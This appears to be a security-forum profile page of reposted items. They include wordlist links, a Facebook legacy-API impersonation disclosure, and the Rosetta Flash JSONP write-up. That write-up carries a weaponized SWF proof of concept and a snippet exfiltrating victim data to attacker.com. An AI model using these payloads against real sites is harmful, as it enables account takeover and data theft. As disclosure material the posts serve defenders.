Everything posted by Nytro

1. There would be two categories: 1. Free things: wordlists, proxies etc., "free" stuff. 2. Premium things: Steam accounts, original licenses etc., "premium" stuff. This way we could create a "Free stuff" category containing the useful things, and a "Premium stuff" subcategory accessible only to users with more than 100 posts. Thoughts?
2. Wordlist Downloads: HashKiller HashKiller AIO InsidePro APassCracker Openwall ftp.ox.ac.uk GDataOnline Cerias.Purdue Outpost9 VulnerabilityAssessment PacketStormSecurity ai.uga.edu-moby cotse1 cotse2 VXChaos Wikipedia-wordlist-Sraveau CrackLib-words SkullSecurity Rapidshare-Wordlist.rar Megaupload-birthdates.rar Megaupload-default-001.rar Megaupload-BIG-WPA-LIST-1.rar Megaupload-BIG-WPA-LIST-2.rar Megaupload-BIG-WPA-LIST-3.rar WPA-PSK-WORDLIST-40-MB-rar WPA-PSK-WORDLIST-2-107-MB-rar Article7 Rapidshare-Bender-ILLIST Rohitab Naxxatoe-dict-total-new-unsorted DiabloHorn-wordlists-sorted Bright-Shadows MIT.edu/~ecprice NeutronSite ArtofHacking CS.Princeton textfiles-suzybatari2 labs.mininova-wordmatch BellSouthpwp Doz.org.uk ics.uci.edu/~kay inf.unideb.hu/~jeszy openDS sslmit.unibo.it/~dsmiraglio informatik.uni-leipzig-vn_words.zip cis.hut.fi Wordlist.sf.cz john.cs.olemiss.edu/~sbs Void.Cyberpunk CoyoteCult andre.facadecomputer aurora.rg.iupui.edu/~schadow cs.bilkent.edu.tr/~ccelik broncgeeks.billings.k12.mt.us/vlong IHTeam Leetupload-Word Lists Offensive-Security WPA Rainbow Tables Password List depositfiles/1z1ipsqi3 MD5Decrypter/Passwords depositfiles/qdcs7nv7x ftp.fu-berlin.de Rapidshare.com/Wordlist.rar Rapidshare.com/Password.zip Megaupload/V0X4Y9NE Megaupload/0UAUNNGT Megaupload/1UA8QMCN md5.Hamaney/happybirthdaytoeq.txt sites.Google.com/ReusableSec Megaupload.com/SNK18CU0 Hotfile.com/Wordlists-20031009-iso.zip Rapidshare.com/Wordlist_do_h4tinho.zip Rapidshare.com/pass50.rar Skullsecurity.org/fbdata.torrent Uber.7z freqsort_dictionary.txt SXDictionaries.zip Hackerzlair Circlemud Source: Password Cracker | MD5 Cracker | Wordlist Download: Wordlist Downloads
3. You've learned one piece of nonsense and you keep clinging to it. Better make them solve an equation or a challenge.
4. Hi, I've noticed that in Offtopic, and especially in the Stuff Tools category, various things are being given away for free: Steam accounts, VPNs, proxies, licenses and much more. In my view, the purpose of the Stuff Tools category is to group programs that don't fit the other categories (Hacking programs or Security programs), for example DVD-burning software, media converters, and so on. That's why I propose a new category for the kind of things currently posted in Stuff Tools. The first name that comes to mind is "Giveaways", but we could pick another name: "Free stuff" or whatever else. Vote if you agree with this idea, and if you do, also share your opinion on the category name.
  5. Hacking Facebook’s Legacy API, Part 1: Making Calls on Behalf of Any User July 8th, 2014 Summary A misconfigured endpoint allowed legacy REST API calls to be made on behalf of any Facebook user using only their user ID, which could be obtained from their profile or through the Graph API. Through REST API calls it was possible to view a user’s private messages, view their private notes and drafts, view their primary email address, update their status, post links to their timeline, post as them to their friends’ or public timelines, comment as them, delete their comments, publish a note as them, edit or delete any of their notes, create a photo album for them, upload a photo for them, tag them in a photo, and like and unlike content for them. All of this could be done without any interaction on the part of the user. An Interesting Request When starting a pentest I like to browse the target site with Burp open to get a feel for how the site is structured and to see the requests that the site is making. While browsing Facebook’s mobile site touch.facebook.com the following request caught my attention: The request was used to get your bookmarks. The request was interesting for three reasons: it was making an API call rather than a request to a dedicated endpoint for bookmarks; it was being made to a nonstandard API endpoint (i.e. not graph.facebook.com); the call was not Graph API or FQL. Doing a Google search for bookmarks.get turned up nothing. After some guessing I found that the method notes.get could also be called which returned your notes. Through some more searching I found that the endpoint was using Facebook’s deprecated REST API. The Facebook REST API The REST API was the predecessor of Facebook’s current Graph API. All of the documentation for the REST API has been removed from Facebook’s website but I was able to piece together some of it from the Wayback Machine. 
The REST API consists of methods that can be called by both Web applications (websites) and Desktop applications (JavaScript, mobile, and desktop applications). To make a call, an application makes a GET or POST request to the REST API endpoint:

POST https://api.facebook.com/restserver.php
method={METHOD}&api_key={API_KEY}&session_key={SESSION_KEY}&...&sig={SIGNATURE}

The request consists of the method being called, the application's API key, a session key for a user, any parameters specific to the method, and a signature. The signature is an MD5 of all of the parameters and either the application's secret, which is generated along with the API key when the application is registered with Facebook, or a session secret, which is returned with a session key for a user. Web applications sign requests with their application secret. Requests signed with the application secret can make calls on behalf of users and to administrative methods. Desktop applications sign requests with a user's session secret. Requests signed with a session secret are limited to making calls only for that user. This allows Desktop applications to make calls without exposing their application secret (which would have to be embedded in the application). An application obtains a session key for a user through an OAuth-like authentication flow. Making Calls on Behalf of Any User From reading the documentation I knew that the actual REST API endpoint was https://api.facebook.com/restserver.php, which meant that the https://touch.facebook.com/api/ endpoint had to be acting as a proxy. This raised the question: what Facebook application was it proxying requests as, and what permissions did the application have? So far I had only called read methods. I attempted to call the publishing method users.setStatus: Calling this method updated the status on the account that I was logged in to.
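The signing scheme described above can be sketched in Python. This is a minimal illustration of the idea (sort the parameters, concatenate them as key=value pairs, append the secret, MD5 the result); all key, secret, and uid values below are invented, and the legacy API's exact canonicalization may have differed in detail:

```python
import hashlib

def sign_rest_call(params: dict, secret: str) -> str:
    # Sort the parameters by name, concatenate them as key=value pairs
    # with no separator, append the application (or session) secret,
    # and take the MD5 hex digest.
    base = "".join(f"{k}={params[k]}" for k in sorted(params))
    return hashlib.md5((base + secret).encode()).hexdigest()

# All values below are made up for illustration.
params = {
    "method": "users.setStatus",
    "api_key": "EXAMPLE_API_KEY",
    "status": "Hello",
    "uid": "100000000000001",  # target user ID in place of a session key
}
sig = sign_rest_call(params, "EXAMPLE_APP_SECRET")
```

Because the proxy forwarded whatever parameters the client supplied and signed with the application secret, injecting a uid parameter like the one above is all the attack required.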
The update was displayed as being made via the Facebook Mobile application: This is an internal application used by the Facebook mobile website. Many internal Facebook applications are authorized and granted full permissions for every user. I was able to confirm that this was the case for the Facebook Mobile application by calling the methods friends.getAppUsers and fql.query. Calling friends.getAppUsers showed that the application was authorized for every friend on the account that I was logged in to. Calling fql.query allowed me to make a FQL query on the permissions table to lookup the permissions that the application had been granted. That I was being authenticated with the REST server as the account that I was logged in to meant that the proxy had to be generating a session key from my session and passing it with each request. This should have limited my ability to make calls only for that account, however, I noticed that in the documentation for many of the methods a session key is optional if the method is being called by a Web application (i.e. the request is being signed with the application’s secret). For these methods a uid parameter can be passed in place of a session key and set to the user ID of any user who has authorized the application and granted it the required permission for the method being called. Through calling users.setStatus I had been able to find out what Facebook application the proxy was using, but more importantly I had been able to confirm that the proxy would pass any parameters to the REST server that I included in a request. The question now was: Was the proxy signing requests with the Facebook Mobile application secret or my session secret? And if the proxy was using the application secret, would the REST server accept the uid parameter? Including the uid parameter in a request would not stop the proxy from also passing a session key and there was the possibility that the REST server would reject the request if both were passed. 
To test it I tried updating the status on a different account than the one I was logged in to by calling users.setStatus with the uid parameter set to the user ID of that account. It worked. The status on the account whose user ID I passed was updated. Not only was the proxy signing requests with the application secret but, equally as important, when passed both a session key and the uid parameter the REST server would prioritize the uid. The documentation for the REST API states that the use of the uid parameter is limited to only those users who have authorized the application and granted it the required permission for the method being called. Since the Facebook Mobile application had been authorized and granted full permissions for every user, it was possible to use the uid parameter to make calls on behalf of any user using any of the methods that supported it. The following methods can be called with the uid parameter:

message.getThreadsInFolder: Returns all of a user's messages.
users.setStatus: Updates a user's status.
links.post: Posts a link to a user's timeline.
stream.publish: Publishes a post to a user's timeline, friend's timeline, page, group, or event.
stream.addComment: Adds a comment to a post as a user.
stream.removeComment: Removes a user's comment from a post.
notes.create: Creates a new note for a user.
notes.edit: Edits a user's note.
notes.delete: Deletes a user's note. This method is only supposed to delete notes that were created by the user through the application. However, in my tests, when called through the proxy it would delete any note.
photos.createAlbum: Creates a new photo album for a user.
photos.upload: Uploads a photo for a user.
photos.addTag: Tags a user in a photo.
stream.addLike: Likes content for a user.
stream.removeLike: Unlikes content for a user.

Some methods that required a session key would return additional information when called through the proxy:

users.getInfo: Returns information on a user. This method is only supposed to return the information on the user that is viewable to the calling user. However, when called through the proxy it would return the user's primary email address regardless of the relationship between the user and the calling user.
notes.get: Returns the notes for a user. This method is only supposed to return the notes for the user that are viewable to the calling user. However, when called through the proxy it would return all of the user's notes, including their drafts.

In addition to the above user methods, the following administrative methods could be called through the proxy on behalf of the Facebook Mobile application:

admin.getAppProperties: Gets the property values set for the application.
admin.setAppProperties: Sets the property values for the application.
admin.getRestrictionInfo: Returns the demographic restrictions for the application.
admin.setRestrictionInfo: Sets the demographic restrictions for the application.
admin.getBannedUsers: Returns a list of the users who have been banned from the application.
admin.banUsers: Bans users from the application.
admin.unbanUsers: Unbans users from the application.
auth.revokeAuthorization: Revokes a user's authorization of the application.
auth.revokeExtendedPermission: Revokes an extended permission for a user of the application.
notifications.sendEmail: Sends an email to a user as the application.

Disclosure

I reported this issue to Facebook on April 23rd. A temporary fix was in place less than three hours after my report. A bounty of $20,000 was awarded by Facebook as part of their Bug Bounty Program.
Timeline

April 23, 4:42pm – Initial report sent
April 23, 5:50pm – Request for clarification from Facebook
April 23, 6:08pm – Clarification sent
April 23, 6:49pm – Acknowledgment of issue by Facebook
April 23, 7:38pm – Notification of temporary fix by Facebook
April 23, 8:39pm – Confirmation of temporary fix sent
April 29, 11:03pm – Notification of permanent fix by Facebook
April 30, 12:58am – Confirmation of permanent fix sent
April 30, 8:35pm – Bounty awarded

Part 2 Preview

If you looked at the REST API Authentication guide and thought that there might be vulnerabilities there, you would have been correct. Both the Web and Desktop authentication flows were vulnerable to CSRF issues that led to full account takeover. These issues were less serious than the API endpoint issue as they required a user to load links while logged in to their account. However, the links could be embedded in a web page or anywhere where images can be embedded. I have embedded one as an image in this blog post. Click to display it. If you're logged in to Facebook I'd have full access to your account (the issue has been fixed). In an actual attack loading the link would not have required a click. Source: Hacking Facebook's Legacy API, Part 1: Making Calls on Behalf of Any User
6. CCR has ruled: the "Big Brother" law on the retention and processing of personal data is unconstitutional

08 Jul 2014

The Constitutional Court of Romania (CCR) ruled today that the provisions of Law 82/2012 on the retention of data generated or processed by providers of public electronic communications networks are unconstitutional. "Following deliberations, the Constitutional Court, by unanimous vote, upheld the objection of unconstitutionality and found that the provisions of Law no. 82/2012 on the retention of data generated or processed by providers of public electronic communications networks and by providers of publicly available electronic communications services, and amending and supplementing Law no. 506/2004 on the processing of personal data and the protection of privacy in the electronic communications sector, are unconstitutional. By unanimous vote, it rejected as unfounded the objection of unconstitutionality regarding the provisions of Art. 152 of the Code of Criminal Procedure," a CCR press release states. In Tuesday's session the Constitutional Court debated the objection of unconstitutionality concerning the provisions of Law 82/2012 on the retention of data generated or processed by providers of public electronic communications networks and by providers of publicly available electronic communications services, and amending and supplementing Law no. 506/2004 on the processing of personal data and the protection of privacy in the electronic communications sector, as well as the provisions of Art. 152 of the Code of Criminal Procedure. The decision is final and generally binding, and is communicated to the two Chambers of Parliament, the Government, and the courts that referred the matter to the Constitutional Court. The reasoning behind the rulings of the plenum of the Constitutional Court will be set out in the decisions, which are published in the Official Gazette of Romania, Part I.
Source: Jurnalul National
7. Abusing JSONP with Rosetta Flash In this blog post I present Rosetta Flash, a tool for converting any SWF file to one composed of only alphanumeric characters in order to abuse JSONP endpoints, making a victim perform arbitrary requests to the domain with the vulnerable endpoint and exfiltrate potentially sensitive data, not limited to JSONP responses, to an attacker-controlled site. In effect, this is a CSRF that bypasses the Same Origin Policy. High profile Google domains (accounts.google.com, www., books., maps., etc.) and YouTube were vulnerable and have been recently fixed. Twitter, Instagram, Tumblr, Olark and eBay still have vulnerable JSONP endpoints at the time of writing this blog post (but Adobe pushed a fix in the latest Flash Player, see the paragraph Mitigations and fix). Update: Kudos to Twitter Security for being so responsive over the weekend, engaged and interested. They have fixed this on their end too. But they admitted I ruined their weekend. This is a well known issue in the infosec community, but so far no public tools for generating arbitrary ASCII-only, or, even better, alphanumeric-only, valid SWF files have been presented. This led website owners and even big players in the industry to postpone any mitigation until a credible proof of concept was provided. So, that moment has come. I will present this vulnerability at Hack In The Box: Malaysia this October, and the Rosetta Flash technology will be featured in the next PoC||GTFO release. A CVE identifier has been assigned: CVE-2014-4671. Slides If you prefer, you can discover the beauty of Rosetta with a set of comprehensive slides. The attack scenario To better understand the attack scenario it is important to take into account the combination of three factors: With Flash, a SWF file can perform cookie-carrying GET and POST requests to the domain that hosts it, with no crossdomain.xml check.
This is why allowing users to upload a SWF file on a sensitive domain is dangerous: by uploading a carefully crafted SWF, an attacker can make the victim perform requests that have side effects and exfiltrate sensitive data to an external, attacker-controlled, domain. JSONP, by design, allows an attacker to control the first bytes of the output of an endpoint by specifying the callback parameter in the request URL. Since most JSONP callbacks restrict the allowed charset to [a-zA-Z], _ and ., my tool focuses on this very restrictive charset, but it is general enough to work with different user-specified allowed charsets. SWF files can be embedded on an attacker-controlled domain using a Content-Type forcing <object> tag, and will be executed as Flash as long as the content looks like a valid Flash file. Rosetta Flash leverages zlib, Huffman encoding and ADLER32 checksum bruteforcing to convert any SWF file to another one composed of only alphanumeric characters, so that it can be passed as a JSONP callback and then reflected by the endpoint, effectively hosting the Flash file on the vulnerable domain. In the Rosetta Flash GitHub repository I provide ready-to-be-pasted, universal, weaponized, full featured proofs of concept with ActionScript sources. But how does Rosetta Flash really work? A bit more on Rosetta Flash Rosetta Flash takes as input an ordinary binary SWF and returns an equivalent one compressed with zlib such that it is composed of alphanumeric characters only. Rosetta Flash uses ad-hoc Huffman encoders in order to map non-allowed bytes to allowed ones. Naturally, since we are mapping a wider charset to a more restrictive one, this is not a real compression, but an inflation: we are effectively using Huffman as a Rosetta stone. A Flash file can be either uncompressed (magic bytes FWS), zlib-compressed (magic bytes CWS) or LZMA-compressed (magic bytes ZWS). [Figure: SWF header formats] Furthermore, Flash parsers are very liberal, and tend to ignore invalid fields.
This is very good for us, because we can force it to the characters we prefer. [Figure: Flash parsers are liberal]

zlib header hacking

We need to make sure that the first two bytes of the zlib stream, which is basically a wrapper over DEFLATE, are OK. Here is how I did that: [Figure: Hacking the first byte of the zlib header] [Figure: Hacking the second byte of the zlib header] There aren't many allowed two-byte sequences for CMF (Compression Method and flags) + CINFO (malleable) + FLG (including a check bit for CMF and FLG that has to match, a preset dictionary bit (not present), and the compression level (ignored)). 0x68 0x43 = hC is allowed, and Rosetta Flash always uses this particular sequence.

ADLER32 checksum bruteforcing

As you can see from the SWF header format, the checksum is the trailing part of the zlib stream included in the compressed SWF in output, so it also needs to be alphanumeric. Rosetta Flash appends bytes in a clever way to get an ADLER32 checksum of the original uncompressed SWF that is made of just [a-zA-Z0-9_\.] characters. An ADLER32 checksum is composed of two 16-bit rolling sums, S1 and S2, concatenated: [Figure: ADLER32 checksum] For our purposes, both S1 and S2 must have a byte representation that is allowed (i.e., all alphanumeric). The question is: how do we find an allowed checksum by manipulating the original uncompressed SWF? Luckily, the SWF file format allows appending arbitrary bytes at the end of the original SWF file: they are ignored. This is gold for us. But what is a clever way to append bytes? I call my approach the Sleds + Deltas technique: [Figure: ADLER32 checksum manipulation] Basically, we can keep adding a high-byte sled (of fe, because ff doesn't play so nicely with the Huffman part we'll roll out later) until there is a single byte we can add to make S1 modulo-overflow and become the minimum allowed byte representation, and then we add that delta. Now we have a valid S1, and we want to keep it fixed.
So we add a NULL bytes sled until S2 modulo-overflows, and we also get a valid S2.

Huffman magic

Once we have an uncompressed SWF with an alphanumeric checksum and a valid alphanumeric zlib header, it's time to create dynamic Huffman codes that translate everything to [a-zA-Z0-9_\.] characters. This is currently done with a pretty raw but effective approach that has to be optimized in order to work effectively for larger files. Twist: the representation of the tables, to be embedded in the file, also has to satisfy the same charset constraints. [Figure: DEFLATE block format] We use two different hand-crafted Huffman encoders that make minimum effort at being efficient, but focus on byte alignment and offsets to get bytes to fall into the allowed charset. In order to reduce the inevitable inflation in size, repeat codes (code 16, mapped to 00) are used to produce shorter output which is still alphanumeric. For more detail, feel free to browse the source code in the Rosetta Flash GitHub repository. Here is how the output file looks, bit-by-bit: [Figure: Rosetta Flash output bit-by-bit]

Wrapping up the output file

We now have everything we need: Success! Here is a completely alphanumeric SWF file! Please enjoy an alphanumeric rickroll, also with lyrics! (might no longer work in the latest Flash Player, see the paragraph Mitigations and fix)

A universal, weaponized proof of concept

Here is an example written in ActionScript 2 (for the mtasc open source compiler):

class X {
    static var app : X;

    function X(mc) {
        if (_root.url) {
            var r:LoadVars = new LoadVars();
            r.onData = function(src:String) {
                if (_root.exfiltrate) {
                    var w:LoadVars = new LoadVars();
                    w.x = src;
                    w.sendAndLoad(_root.exfiltrate, w, "POST");
                }
            }
            r.load(_root.url, r, "GET");
        }
    }

    // entry point
    static function main(mc) {
        app = new X(mc);
    }
}

We compile it to an uncompressed SWF file, and feed it to Rosetta Flash.
The alphanumeric output (wrapped, remove newlines) is: CWSMIKI0hCD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7iiudIbEAt333swW0ssG03 sDDtDDDt0333333Gt333swwv3wwwFPOHtoHHvwHHFhH3D0Up0IZUnnnnnnnnnnnnnnnnnnnU U5nnnnnn3Snn7YNqdIbeUUUfV13333333333333333s03sDTVqefXAxooooD0CiudIbEAt33 swwEpt0GDG0GtDDDtwwGGGGGsGDt33333www033333GfBDTHHHHUhHHHeRjHHHhHHUccUSsg SkKoE5D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7YNqdIbe13333333333sUUe133 333Wf03sDTVqefXA8oT50CiudIbEAtwEpDDG033sDDGtwGDtwwDwttDDDGwtwG33wwGt0w33 333sG03sDDdFPhHHHbWqHxHjHZNAqFzAHZYqqEHeYAHlqzfJzYyHqQdzEzHVMvnAEYzEVHMH bBRrHyVQfDQflqzfHLTrHAqzfHIYqEqEmIVHaznQHzIIHDRRVEbYqItAzNyH7D0Up0IZUnnn nnnnnnnnnnnnnnnnUU5nnnnnn3Snn7CiudIbEAt33swwEDt0GGDDDGptDtwwG0GGptDDww0G DtDDDGGDDGDDtDD33333s03GdFPXHLHAZZOXHrhwXHLhAwXHLHgBHHhHDEHXsSHoHwXHLXAw XHLxMZOXHWHwtHtHHHHLDUGhHxvwDHDxLdgbHHhHDEHXkKSHuHwXHLXAwXHLTMZOXHeHwtHt HHHHLDUGhHxvwTHDxLtDXmwTHLLDxLXAwXHLTMwlHtxHHHDxLlCvm7D0Up0IZUnnnnnnnnnn nnnnnnnnnUU5nnnnnn3Snn7CiudIbEAtuwt3sG33ww0sDtDt0333GDw0w33333www033GdFP DHTLxXThnohHTXgotHdXHHHxXTlWf7D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7C iudIbEAtwwWtD333wwG03www0GDGpt03wDDDGDDD33333s033GdFPhHHkoDHDHTLKwhHhzoD HDHTlOLHHhHxeHXWgHZHoXHTHNo4D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7Ciu dIbEAt33wwE03GDDGwGGDDGDwGtwDtwDDGGDDtGDwwGw0GDDw0w33333www033GdFPHLRDXt hHHHLHqeeorHthHHHXDhtxHHHLravHQxQHHHOnHDHyMIuiCyIYEHWSsgHmHKcskHoXHLHwhH HvoXHLhAotHthHHHLXAoXHLxUvH1D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SnnwWNq dIbe133333333333333333WfF03sTeqefXA888oooooooooooooooooooooooooooooooooo oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo oooooooooooooooooooooooooooooooo888888880Nj0h The attacker has to simply host this HTML page on his/her domain, together with a crossdomain.xml file in the root that allows external connections from victims, and make the victim load it. 
<object type="application/x-shockwave-flash" data="https://vulnerable.com/endpoint?callback=CWSMIKI0hCD0Up0IZUnnnnnnnn nnnnnnnnnnnUU5nnnnnn3Snn7iiudIbEAt333swW0ssG03sDDtDDDt0333333Gt333swwv3ww wFPOHtoHHvwHHFhH3D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7YNqdIbeUUUfV133 33333333333333s03sDTVqefXAxooooD0CiudIbEAt33swwEpt0GDG0GtDDDtwwGGGGGsGDt3 3333www033333GfBDTHHHHUhHHHeRjHHHhHHUccUSsgSkKoE5D0Up0IZUnnnnnnnnnnnnnnnn nnnUU5nnnnnn3Snn7YNqdIbe13333333333sUUe133333Wf03sDTVqefXA8oT50CiudIbEAtw EpDDG033sDDGtwGDtwwDwttDDDGwtwG33wwGt0w33333sG03sDDdFPhHHHbWqHxHjHZNAqFzA HZYqqEHeYAHlqzfJzYyHqQdzEzHVMvnAEYzEVHMHbBRrHyVQfDQflqzfHLTrHAqzfHIYqEqEm IVHaznQHzIIHDRRVEbYqItAzNyH7D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7Ciud IbEAt33swwEDt0GGDDDGptDtwwG0GGptDDww0GDtDDDGGDDGDDtDD33333s03GdFPXHLHAZZO XHrhwXHLhAwXHLHgBHHhHDEHXsSHoHwXHLXAwXHLxMZOXHWHwtHtHHHHLDUGhHxvwDHDxLdgb HHhHDEHXkKSHuHwXHLXAwXHLTMZOXHeHwtHtHHHHLDUGhHxvwTHDxLtDXmwTHLLDxLXAwXHLT MwlHtxHHHDxLlCvm7D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7CiudIbEAtuwt3sG 33ww0sDtDt0333GDw0w33333www033GdFPDHTLxXThnohHTXgotHdXHHHxXTlWf7D0Up0IZUn nnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7CiudIbEAtwwWtD333wwG03www0GDGpt03wDDDGDDD 33333s033GdFPhHHkoDHDHTLKwhHhzoDHDHTlOLHHhHxeHXWgHZHoXHTHNo4D0Up0IZUnnnnn nnnnnnnnnnnnnnUU5nnnnnn3Snn7CiudIbEAt33wwE03GDDGwGGDDGDwGtwDtwDDGGDDtGDww Gw0GDDw0w33333www033GdFPHLRDXthHHHLHqeeorHthHHHXDhtxHHHLravHQxQHHHOnHDHyM IuiCyIYEHWSsgHmHKcskHoXHLHwhHHvoXHLhAotHthHHHLXAoXHLxUvH1D0Up0IZUnnnnnnnn nnnnnnnnnnnUU5nnnnnn3SnnwWNqdIbe133333333333333333WfF03sTeqefXA888ooooooo ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo ooooooooooooooooooooooooooooooooooooooooooooooooooooooooo888888880Nj0h" style="display: none"> <param name="FlashVars" value="url=https://vulnerable.com/account/sensitive_content_logged_in &exfiltrate=http://attacker.com/log.php"> </object> This universal proof of concept accepts two parameters passed as FlashVars: url — the 
URL in the same domain of the vulnerable endpoint to which to perform a GET request with the victim's cookie. exfiltrate — the attacker-controlled URL to which to POST a x variable with the exfiltrated data.

Mitigations and fix

Mitigations by Adobe

Because of the sensitivity of this vulnerability, I first disclosed it internally in Google, and then privately to Adobe PSIRT. A few days before releasing the code and publishing this blog post, I also notified Twitter, eBay, Tumblr and Instagram. Adobe confirmed they pushed a tentative fix in Flash Player 14 beta codename Lombard (version 14.0.0.125, release notes) and finalized the fix in today's release (version 14.0.0.145, released on July 8, 2014). In the security bulletin APSB14-17, Adobe mentions a stricter verification of the SWF file format: These updates include additional validation checks to ensure that Flash Player rejects malicious content from vulnerable JSONP callback APIs (CVE-2014-4671).

Mitigations by website owners

First of all, it is important to avoid using JSONP on sensitive domains, and if possible use a dedicated sandbox domain. A mitigation is to make endpoints return the HTTP header Content-Disposition: attachment; filename=f.txt, forcing a file download. This is enough to instruct Flash Player not to run the SWF, starting from Adobe Flash 10.2. To also be protected from content sniffing attacks, prepend the reflected callback with /**/. This is exactly what Google, Facebook and GitHub are currently doing. Furthermore, to hinder this attack vector in Chrome and Opera you can also return the HTTP header X-Content-Type-Options: nosniff. If the JSONP endpoint returns a Content-Type which is not application/x-shockwave-flash (usually application/javascript or application/json), Flash Player will refuse to execute the SWF. Source: Abusing JSONP with Rosetta Flash
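The zlib-header and ADLER32 constraints described in this post can be illustrated with a rough Python sketch of the sleds-and-deltas idea. This is a simplification for intuition only, not Rosetta Flash's actual code (the real tool must additionally keep the appended bytes compatible with its Huffman encoding), and the sample input is a stand-in for a real SWF body:

```python
import string
import zlib

# The charset a typical JSONP callback allows, per the post: [a-zA-Z0-9_\.]
ALLOWED = {ord(c) for c in string.ascii_letters + string.digits + "_."}

def ok16(v: int) -> bool:
    """True if both bytes of a 16-bit word fall in the allowed charset."""
    return (v >> 8) in ALLOWED and (v & 0xFF) in ALLOWED

def adler_parts(data):
    a = zlib.adler32(data)
    return a & 0xFFFF, a >> 16  # S1 (low 16 bits), S2 (high 16 bits)

# The header pair 0x68 0x43 ("hC") really is a valid zlib header:
# CMF*256 + FLG must be divisible by 31.
assert (0x68 * 256 + 0x43) % 31 == 0

def alnum_checksum_tail(data: bytes) -> bytes:
    """Append ignored trailing bytes until every byte of the ADLER32
    checksum is in the allowed charset (the sleds + deltas idea)."""
    out = bytearray(data)
    # Phase 1: 0xFE sled until a single delta byte lands S1 on an allowed value.
    while True:
        s1, _ = adler_parts(out)
        if ok16(s1):
            break
        delta = next((b for b in range(256) if ok16((s1 + b) % 65521)), None)
        out.append(delta if delta is not None else 0xFE)
    # Phase 2: NULL sled leaves S1 untouched while S2 advances by S1 per byte.
    while not ok16(adler_parts(out)[1]):
        out.append(0x00)
    return bytes(out)

padded = alnum_checksum_tail(b"FWS" + bytes(64))  # stand-in for a SWF body
```

After padding, all four checksum bytes are in the allowed set, which is why the trailing ADLER32 of the final zlib stream survives the callback filter.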
8. A review of the Blackphone, the Android for the paranoid Custom-built with privacy in mind, this handset isn't for (Google) Play. by Sean Gallagher - June 30, 2014 Built for privacy, the Blackphone runs a beefed-up Android called PrivatOS. Based on some recent experience, I'm of the opinion that smartphones are about as private as a gas station bathroom. They're full of leaks, prone to surveillance, and what security they do have comes from using really awkward keys. While there are tools available to help improve the security and privacy of smartphones, they're generally intended for enterprise customers. No one has had a real one-stop solution: a smartphone pre-configured for privacy that anyone can use without being a cypherpunk. That is, until now. The Blackphone is the first consumer-grade smartphone to be built explicitly for privacy. It pulls together a collection of services and software that are intended to make covering your digital assets simple—or at least more straightforward. The product of SGP Technologies, a joint venture between the cryptographic service Silent Circle and the specialty mobile hardware manufacturer Geeksphone, the Blackphone starts shipping to customers who preordered it sometime this week. It will become available for immediate purchase online shortly afterward. Full article: Exclusive: A review of the Blackphone, the Android for the paranoid | Ars Technica
9. CentOS 7.0.1406 Release Notes Last updated: July 07, 2014 Contents: Translations, Introduction, Install Media, Verifying Downloaded Installation Images, Major Changes, Deprecated Features, Known Issues, Fixed Issues, Packages and Applications (Packages modified by CentOS, Packages removed from CentOS that are included upstream, Packages added by CentOS that are not included upstream, Sources), How to help and get help (Special Interest Groups, Mailing Lists and Fora, Wiki and Website), Further Reading, Thanks. Source: Manuals/ReleaseNotes/CentOS7 - CentOS Wiki
10. Hidden Process Detection

Hiding the Rootkit Process
Detecting the Hidden Rootkit Process
Hidden Process Detection [HPD] using Direct NT System Call Implementation
Hidden Process Detection [HPD] using PIDB (Process ID Bruteforce) method
Hidden Process Detection [HPD] with CSRSS Process Handle Enumeration
Other Methods of Detecting Hidden Processes
References

Hiding the Rootkit Process

Rootkits use a variety of methods to hide their processes from detection as well as from termination. One of the best methods a userland rootkit can employ to evade detection is to hook the NtOpenProcess function and return a negative result for its own processes. This not only protects rootkit processes from most detection methods, but also prevents their termination. However, anti-rootkit software typically uses NtQuerySystemInformation to enumerate all the process IDs and the various handles related to processes in order to uncover any hidden processes. To prevent such detection, rootkits hook NtQuerySystemInformation and tamper with the results to cover all their tracks.

Detecting the Hidden Rootkit Process

Detecting a hidden process is equally challenging, as a rootkit can employ one or more methods to cover its presence. Here are some very effective methods to detect such rootkit processes. All these detection methods share a common approach. First, the list of running processes is obtained through standard API functions such as EnumProcesses or Process32First. Then one of the methods below is used to enumerate the processes, and that list is compared with the previously obtained list to find any hidden rootkit process.

HPD using Direct NT System Call Implementation

This is a very effective method to detect hidden userland rootkit processes. One of the lesser-known ways of enumerating processes is to use the NtQuerySystemInformation function, passing SystemProcessesAndThreadsInformation as the first parameter.
The drawback of this method is that it can be easily circumvented by hooking the NtQuerySystemInformation function and tampering with the results. The user-mode NtQuerySystemInformation is basically a stub with a few lines of code that transition from user land to kernel land, where the kernel's NtQuerySystemInformation is finally called. So the trick is to perform this transition directly, without calling the hookable stub. Here is sample code that shows how one can invoke NtQuerySystemInformation directly on various platforms. On Windows 2000, INT 2E is used to transition from user to kernel mode; from XP onwards, the 'sysenter' instruction is used.

__declspec(naked) NTSTATUS __stdcall DirectNTQuerySystemInformation(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength)
{
    // For Windows 2000
    if( OSMajorVersion == 5 && OSMinorVersion == 0 )
    {
        __asm
        {
            mov eax, 0x97
            lea edx, DWORD PTR ss:[esp+4]
            INT 0x2E
            ret 0x10
        }
    }

    // For Windows XP
    if( OSMajorVersion == 5 && OSMinorVersion == 1 )
    {
        __asm
        {
            mov eax, 0xAD
            call SystemCall_XP
            ret 0x10
SystemCall_XP:
            mov edx, esp
            sysenter
        }
    }

    // For Windows Vista & Longhorn
    if( OSMajorVersion == 6 && OSMinorVersion == 0 )
    {
        __asm
        {
            mov eax, 0xF8
            call SystemCall_VISTA
            ret 0x10
SystemCall_VISTA:
            mov edx, esp
            sysenter
        }
    }

    // For Windows 7
    if( OSMajorVersion == 6 && OSMinorVersion == 1 )
    {
